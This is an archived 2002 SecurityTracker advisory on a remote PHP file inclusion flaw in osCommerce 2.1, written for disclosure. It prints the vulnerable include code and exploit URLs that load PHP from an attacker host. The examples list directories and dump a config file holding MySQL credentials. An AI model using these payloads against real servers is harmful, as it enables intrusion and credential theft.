SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   osCommerce Vendors:   osCommerce
osCommerce e-Commerce Shopping Cart Software Lets Remote Users Execute Arbitrary PHP Code and System Commands on the Server
SecurityTracker Alert ID:  1004562
SecurityTracker URL:  http://securitytracker.com/id/1004562
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): Preview Release 2.1
Description:   An input validation hole was reported in the osCommerce online commerce software. A remote user can execute arbitrary PHP code, including arbitrary system commands, on the server.

The flaw is reportedly located in the '/catalog/includes/include_once.php' file. A remote user can specify a PHP file on a remote server to be included by this script.

A demonstration exploit URL is provided:

http://SERVER/catalog/inludes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE

The remote user could send arbitrary queries to the underlying SQL server or could execute arbitrary shell commands on the system.

Some example exploits are described in the Source Message.

Impact:   A remote user can execute arbitrary PHP code on the system. The code will run with the privileges of the web PHP process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.oscommerce.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  PHP source injection in osCommerce




PHP source injection in osCommerce
----------------------------------

Product Description

osCommerce is an open source e-commerce solution under on going 
development by the open source community. Its feature packed out-of-the-
box installation allows store owners to setup, run, and maintain their 
online stores with minimum effort and with no costs involved. It can be 
found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are alot of online shops who use 
this)


The Problem

osCommerce commes with a file called /catalog/includes/include_once.php, 
and looks like this:

-------- include_once.php --------
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
	include($include_file);
  }
?>
----------------------------------

If someone request a URL like 
http://SERVER/catalog/inludes/include_once.php?
include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code 
he wants

This could be a serious problem because this user could query the SQL 
server and get acccess to other important files...

Examples

-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current dierctory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file wich includes MySQL username, 
password, ...
---------------------------

I informed the vendor and hope that they will release a patch soon

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC